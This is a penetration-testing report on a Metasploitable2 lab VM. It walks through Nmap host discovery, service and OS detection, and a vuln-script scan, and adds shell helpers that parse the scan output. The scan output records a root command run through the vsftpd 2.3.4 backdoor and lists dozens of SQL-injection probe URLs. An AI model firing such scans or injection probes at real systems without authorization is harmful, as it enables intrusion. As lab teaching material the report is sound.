
    Vulnerability Assessment & Penetration Testing Report on Metasploitable2


    VAPT stands for Vulnerability Assessment and Penetration Testing. Vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructure, and of giving the organization doing the assessment the knowledge, awareness and risk background it needs to understand the threats to its environment and react appropriately.


    Penetration testing (or pentesting) is a simulated cyber attack in which professional ethical hackers break into corporate networks to find weaknesses ... before attackers do.

    It's like the movie Sneakers, where hacker-consultants break into your corporate networks to find weaknesses before attackers do. It is a simulated cyber attack in which the pentester, or ethical hacker, uses the same tools and techniques that are available to malicious hackers.



    Life Cycle of Penetration Testing:

    1] Reconnaissance

    2] Scanning

    3] Exploitation

    4] Maintaining Access



    Reconnaissance


    First, reconnaissance denotes the information gathering done before any real attack is planned. Recon is usually the longest phase, sometimes taking weeks or months. Here, however, we already have a known target: a Metasploitable2 machine connected to the same network as our own. To find the target machine we will run an Nmap scan.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo nmap -sV -sP 192.168.43.1-255 > livehosts.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    Here, as you can see in the command line above, a whole IP range is given because we want the OS details of every system connected to the network so that we can find our target machine. First we need to separate out the live IP addresses, so we save the result of the scan above in a text file (livehosts.txt) and then filter the addresses out of it with the following command:

    cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt

    This keeps only the "Nmap scan report for ..." lines, takes the fifth space-separated field (the address) from each, and saves the output in a new file. The result is shown below.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat ip.txt                                              
    192.168.43.1
    192.168.43.120
    192.168.43.152
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
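    The cut -d " " -f5 filter above relies on field 5 of each "Nmap scan report for ..." line being an address. When Nmap can resolve a name, that line reads "Nmap scan report for hostname (IP)" and field 5 becomes the hostname, so ip.txt would then contain names rather than addresses; with -v, Nmap also prints report lines for hosts that are down. The shell function below is an added example that is not part of the original report; it handles both line forms and drops down hosts. The scan output it parses is a constructed sample that mirrors the format of livehosts.txt, not the real file.

```shell
#!/bin/sh
# Added example (not from the original report): pull live-host IPs out of
# saved Nmap output. Unlike `cut -f5`, this also handles the
# "Nmap scan report for hostname (IP)" form Nmap prints when it resolves a
# name, and drops the "[host down]" lines that appear under -v.

# Constructed sample in the format of livehosts.txt (not real scan output).
SAMPLE_LIVEHOSTS='Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:10 IST
Nmap scan report for 192.168.43.1
Host is up (0.0026s latency).
Nmap scan report for metasploitable.localdomain (192.168.43.120)
Host is up (0.00071s latency).
Nmap scan report for 192.168.43.152
Host is up (0.000089s latency).
Nmap scan report for 192.168.43.200 [host down]
Nmap done: 255 IP addresses (3 hosts up) scanned in 12.34 seconds'

# live_ips: read Nmap normal output on stdin, print one IP per line.
#   1st sed expression: "...for hostname (IP)" -> IP
#   2nd sed expression: "...for IP"            -> IP
live_ips() {
    grep '^Nmap scan report for ' \
        | grep -v '\[host down\]' \
        | sed -E 's/.*\(([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)\)$/\1/; s/^Nmap scan report for //'
}

# Stand-alone run on the sample. Against the real file the pipeline is:
#   live_ips < livehosts.txt > ip.txt
printf '%s\n' "$SAMPLE_LIVEHOSTS" | live_ips
```

    Run against the sample this prints the three live addresses only; the resolved hostname and the down host do not leak into the list that the next step feeds to -iL.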
    


    Now we have to check which of these hosts is the Metasploitable2 machine, so we run Nmap with service and OS detection (-sV -O) against all the live IPs:



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo nmap -sV -O -iL ip.txt > osdetails.txt        
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ ls
    ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    



    Our output is here :-)



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat osdetails.txt                                       
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:24 IST
    Nmap scan report for 192.168.43.1
    Host is up (0.0026s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE VERSION
    53/tcp open  domain  dnsmasq 2.51
    MAC Address: 2A:09:08:63:43:8D (Unknown)
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=7/9%OT=53%CT=1%CU=37640%PV=Y%DS=1%DC=D%G=Y%M=2A0908%TM
    OS:=60E88DBB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%
    OS:TS=A)OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5
    OS:=M5B4ST11NW8%O6=M5B4ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=
    OS:FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M5B4NNSNW8%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
    OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
    OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
    OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
    OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
    OS:%T=40%CD=S)
    
    Network Distance: 1 hop
    
    Nmap scan report for 192.168.43.120
    Host is up (0.00071s latency).
    Not shown: 977 closed ports
    PORT     STATE SERVICE     VERSION
    21/tcp   open  ftp         vsftpd 2.3.4
    22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
    23/tcp   open  telnet      Linux telnetd
    25/tcp   open  smtp        Postfix smtpd
    53/tcp   open  domain      ISC BIND 9.4.2
    80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    111/tcp  open  rpcbind     2 (RPC #100000)
    139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    512/tcp  open  exec?
    513/tcp  open  login
    514/tcp  open  shell?
    1099/tcp open  java-rmi    GNU Classpath grmiregistry
    1524/tcp open  bindshell   Metasploitable root shell
    2049/tcp open  nfs         2-4 (RPC #100003)
    2121/tcp open  ftp         ProFTPD 1.3.1
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
    5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
    5900/tcp open  vnc         VNC (protocol 3.3)
    6000/tcp open  X11         (access denied)
    6667/tcp open  irc         UnrealIRCd
    8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
    8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port514-TCP:V=7.91%I=7%D=7/9%Time=60E88D70%P=x86_64-pc-linux-gnu%r(NULL
    SF:,37,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(KumarAt
    SF:ulJaiswal\)\n");
    MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.9 - 2.6.33
    Network Distance: 1 hop
    Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    Nmap scan report for 192.168.43.152
    Host is up (0.000089s latency).
    Not shown: 999 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6.32
    OS details: Linux 2.6.32
    Network Distance: 0 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 3 IP addresses (3 hosts up) scanned in 79.04 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    
    
    
    


    As you can see, a lot of information is retrieved here: ports, services, versions, the TCP/IP fingerprint, hostnames, OS details, MAC addresses, network distance and so on. The host at 192.168.43.120, with its Metasploitable hostnames and long list of open services, is our target.
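    A report reader rarely wants the raw -sV -O output; they want one line per host saying what it runs and what on it is obviously wrong. The following shell function is an added example, not something from the original report: it condenses saved Nmap output into an inventory line per host and flags clear-text or unauthenticated remote-access services (telnet, ftp, rexec/rlogin/rsh, the Metasploitable bindshell) that a defender would remove first. The input is a constructed sample in the format of osdetails.txt, trimmed to a few ports per host.

```shell
#!/bin/sh
# Added example (not from the original report): turn saved "nmap -sV -O" output
# into a one-line-per-host inventory and flag services a defender would want
# removed. The input below is a constructed sample in the format of osdetails.txt.

SAMPLE_OSDETAILS='Nmap scan report for 192.168.43.1
Host is up (0.0026s latency).
PORT   STATE SERVICE VERSION
53/tcp open  domain  dnsmasq 2.51
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Nmap scan report for 192.168.43.120
Host is up (0.00071s latency).
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
512/tcp  open  exec?
513/tcp  open  login
1524/tcp open  bindshell   Metasploitable root shell
OS details: Linux 2.6.9 - 2.6.33

Nmap scan report for 192.168.43.152
Host is up (0.000089s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
OS details: Linux 2.6.32'

# host_inventory: reads Nmap normal output on stdin and prints
#   IP|OS details|open port count|flagged services
# Flagged services are clear-text or unauthenticated remote-access services
# (telnet, ftp, rexec/rlogin/rsh, the Metasploitable bindshell); "-" means none.
host_inventory() {
    awk '
        function flush() {
            if (ip != "")
                printf "%s|%s|%d|%s\n", ip, os, ports, (flags == "" ? "-" : flags)
            ip = ""; os = "unknown"; ports = 0; flags = ""
        }
        BEGIN { os = "unknown" }
        /^Nmap scan report for / { flush(); ip = $NF; gsub(/[()]/, "", ip) }
        /^OS details: /          { os = substr($0, 13) }
        $2 == "open" && $1 ~ /^[0-9]+\// {
            ports++
            svc = $3; sub(/[?]$/, "", svc)          # "exec?" -> "exec"
            if (svc ~ /^(telnet|ftp|exec|login|shell|bindshell)$/)
                flags = flags (flags == "" ? "" : ",") svc
        }
        END { flush() }
    '
}

# Stand-alone run on the sample; against the real file: host_inventory < osdetails.txt
printf '%s\n' "$SAMPLE_OSDETAILS" | host_inventory
```

    The flagged column is what distinguishes the target from the other two hosts at a glance: the dnsmasq host and the scanning machine get "-", while 192.168.43.120 is flagged for ftp, telnet, rexec, rlogin and the bindshell. The service names come from Nmap's own SERVICE column, so a service Nmap marks with a trailing "?" (unconfirmed) is still counted.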



    Vulnerability Scanning


    In this scanning step we scan the target machine for known vulnerabilities. Again we use Nmap, this time with the vuln script category (--script vuln), which runs the NSE scripts that check services for known vulnerabilities:
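    The --script vuln output is long and mixes findings with "NOT VULNERABLE" results, spidered URLs and references, so for the report it helps to pull out just the findings, with their state and CVE, into a table. The shell function below is an added example, not code from the original report; it relies on the layout of NSE vuln output, where a finding's title is the line indented two spaces immediately before its "State:" line and the "IDs:" line follows the state. The input is a constructed excerpt in the format of vuln.txt, not the real scan.

```shell
#!/bin/sh
# Added example (not from the original report): extract every finding that
# Nmap's vuln scripts mark as VULNERABLE (or LIKELY VULNERABLE) from saved
# "--script vuln" output, as a findings table for the report. The input below
# is a constructed excerpt in the format of vuln.txt, not the real scan.

SAMPLE_VULN='Nmap scan report for 192.168.43.120
PORT     STATE SERVICE
21/tcp   open  ftp
| ftp-vsftpd-backdoor: 
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  BID:48539  CVE:CVE-2011-2523
|_    Disclosure date: 2011-07-03
25/tcp   open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|   
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|_    IDs:  BID:74733  CVE:CVE-2015-4000
80/tcp   open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|_    IDs:  CVE:CVE-2007-6750'

# vuln_findings: reads NSE output on stdin, prints one line per finding:
#   port|script|finding title|state|CVE (or n/a)
# The title is the 2-space-indented line right before "State:"; "IDs:" comes
# after the state, so a finding is buffered until the next title, script,
# port line or end of input and only then printed.
vuln_findings() {
    awk '
        function emit() {
            if (pend != "")
                printf "%s|%s|%s|%s|%s\n", port, script, title, pend, (cve == "" ? "n/a" : cve)
            pend = ""; cve = ""
        }
        /^[0-9]+\/(tcp|udp)/ { emit(); port = $1; script = ""; title = "" }
        /^[|][ _][a-z0-9-]+: *$/ {
            emit(); script = $0; sub(/^[|][ _]/, "", script); sub(/: *$/, "", script)
        }
        /^[|][ _]  [^ ]/ && $0 !~ /VULNERABLE:$/ {
            emit(); title = $0; sub(/^[|][ _]  /, "", title)
        }
        /^[|][ _]    State: / { emit(); pend = $0; sub(/^.*State: /, "", pend) }
        /^[|][ _]    IDs:/ && match($0, /CVE:[^ ]+/) {
            cve = substr($0, RSTART + 4, RLENGTH - 4)
        }
        END { emit() }
    '
}

# Stand-alone run on the sample; against the real file: vuln_findings < vuln.txt
printf '%s\n' "$SAMPLE_VULN" | vuln_findings
```

    On the sample this yields four rows (the vsftpd backdoor, the two Diffie-Hellman findings on the SMTP service, and Slowloris) and drops the "NOT VULNERABLE" Exim check, because a result line without a following "State:" is never emitted. Findings that carry no CVE, such as the anonymous-DH one, get "n/a" rather than a fabricated identifier.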




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ sudo nmap -Pn --script vuln 192.168.43.120 > vuln.txt
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    
    
    

    The output is here - 



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
    └─$ cat vuln.txt              
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:31 IST
    Nmap scan report for 192.168.43.120
    Host is up (0.00014s latency).
    Not shown: 977 closed ports
    PORT     STATE SERVICE
    21/tcp   open  ftp
    | ftp-vsftpd-backdoor: 
    |   VULNERABLE:
    |   vsFTPd version 2.3.4 backdoor
    |     State: VULNERABLE (Exploitable)
    |     IDs:  BID:48539  CVE:CVE-2011-2523
    |       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
    |     Disclosure date: 2011-07-03
    |     Exploit results:
    |       Shell command: id
    |       Results: uid=0(root) gid=0(root)
    |     References:
    |       https://www.securityfocus.com/bid/48539
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
    |       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
    |_      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
    |_sslv2-drown: 
    22/tcp   open  ssh
    23/tcp   open  telnet
    25/tcp   open  smtp
    | smtp-vuln-cve2010-4344: 
    |_  The SMTP server is not Exim: NOT VULNERABLE
    | ssl-dh-params: 
    |   VULNERABLE:
    |   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
    |     State: VULNERABLE
    |       Transport Layer Security (TLS) services that use anonymous
    |       Diffie-Hellman key exchange only provide protection against passive
    |       eavesdropping, and are vulnerable to active man-in-the-middle attacks
    |       which could completely compromise the confidentiality and integrity
    |       of any data exchanged over the resulting session.
    |     Check results:
    |       ANONYMOUS DH GROUP 1
    |             Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: Unknown/Custom-generated
    |             Modulus Length: 512
    |             Generator Length: 8
    |             Public Key Length: 512
    |     References:
    |       https://www.ietf.org/rfc/rfc2246.txt
    |   
    |   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
    |     State: VULNERABLE
    |     IDs:  BID:74733  CVE:CVE-2015-4000
    |       The Transport Layer Security (TLS) protocol contains a flaw that is
    |       triggered when handling Diffie-Hellman key exchanges defined with
    |       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
    |       to downgrade the security of a TLS session to 512-bit export-grade
    |       cryptography, which is significantly weaker, allowing the attacker
    |       to more easily break the encryption and monitor or tamper with
    |       the encrypted stream.
    |     Disclosure date: 2015-5-19
    |     Check results:
    |       EXPORT-GRADE DH GROUP 1
    |             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: Unknown/Custom-generated
    |             Modulus Length: 512
    |             Generator Length: 8
    |             Public Key Length: 512
    |     References:
    |       https://www.securityfocus.com/bid/74733
    |       https://weakdh.org
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
    |   
    |   Diffie-Hellman Key Exchange Insufficient Group Strength
    |     State: VULNERABLE
    |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
    |       of insufficient strength, especially those using one of a few commonly
    |       shared groups, may be susceptible to passive eavesdropping attacks.
    |     Check results:
    |       WEAK DH GROUP 1
    |             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
    |             Modulus Type: Safe prime
    |             Modulus Source: postfix builtin
    |             Modulus Length: 1024
    |             Generator Length: 8
    |             Public Key Length: 1024
    |     References:
    |_      https://weakdh.org
    | ssl-poodle: 
    |   VULNERABLE:
    |   SSL POODLE information leak
    |     State: VULNERABLE
    |     IDs:  BID:70574  CVE:CVE-2014-3566
    |           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
    |           products, uses nondeterministic CBC padding, which makes it easier
    |           for man-in-the-middle attackers to obtain cleartext data via a
    |           padding-oracle attack, aka the "POODLE" issue.
    |     Disclosure date: 2014-10-14
    |     Check results:
    |       TLS_RSA_WITH_AES_128_CBC_SHA
    |     References:
    |       https://www.securityfocus.com/bid/70574
    |       https://www.openssl.org/~bodo/ssl-poodle.pdf
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
    |_      https://www.imperialviolet.org/2014/10/14/poodle.html
    |_sslv2-drown: ERROR: Script execution failed (use -d to debug)
    53/tcp   open  domain
    80/tcp   open  http
    | http-csrf: 
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.43.120
    |   Found the following possible CSRF vulnerabilities: 
    |     
    |     Path: http://192.168.43.120:80/dvwa/
    |     Form id: 
    |     Form action: login.php
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/passwd/TWiki/WebHome
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/passwd/Main/WebHome
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/edit/TWiki/
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins
    |     
    |     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
    |     Form id: 
    |     Form action: http://TWiki.org/cgi-bin/manage/TWiki/ManagingWebs
    |     
    |     Path: http://192.168.43.120:80/mutillidae/index.php?page=register.php
    |     Form id: id-bad-cred-tr
    |     Form action: index.php?page=register.php
    |     
    |     Path: http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php
    |     Form id: iddnslookupform
    |     Form action: index.php?page=dns-lookup.php
    |     
    |     Path: http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php
    |     Form id: idpollform
    |_    Form action: index.php
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-enum: 
    |   /tikiwiki/: Tikiwiki
    |   /test/: Test page
    |   /phpinfo.php: Possible information file
    |   /phpMyAdmin/: phpMyAdmin
    |   /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
    |   /html/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
    |   /icons/: Potentially interesting folder w/ directory listing
    |_  /index/: Potentially interesting folder
    | http-fileupload-exploiter: 
    |   
    |_    Couldn't find a file-type field.
    | http-slowloris-check: 
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |       
    |     Disclosure date: 2009-09-17
    |     References:
    |       http://ha.ckers.org/slowloris/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    | http-sql-injection: 
    |   Possible sqli for queries:
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dD%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=usage-instructions.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=notes.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=php-errors.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
    |     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=home.php
    |     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=home.php
    |     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
    |     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider&param1=1.10
    |     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
    |     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
    |     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider&param1=1.10
    |     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%20OR%20sqlspider
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
    |     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
    |     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
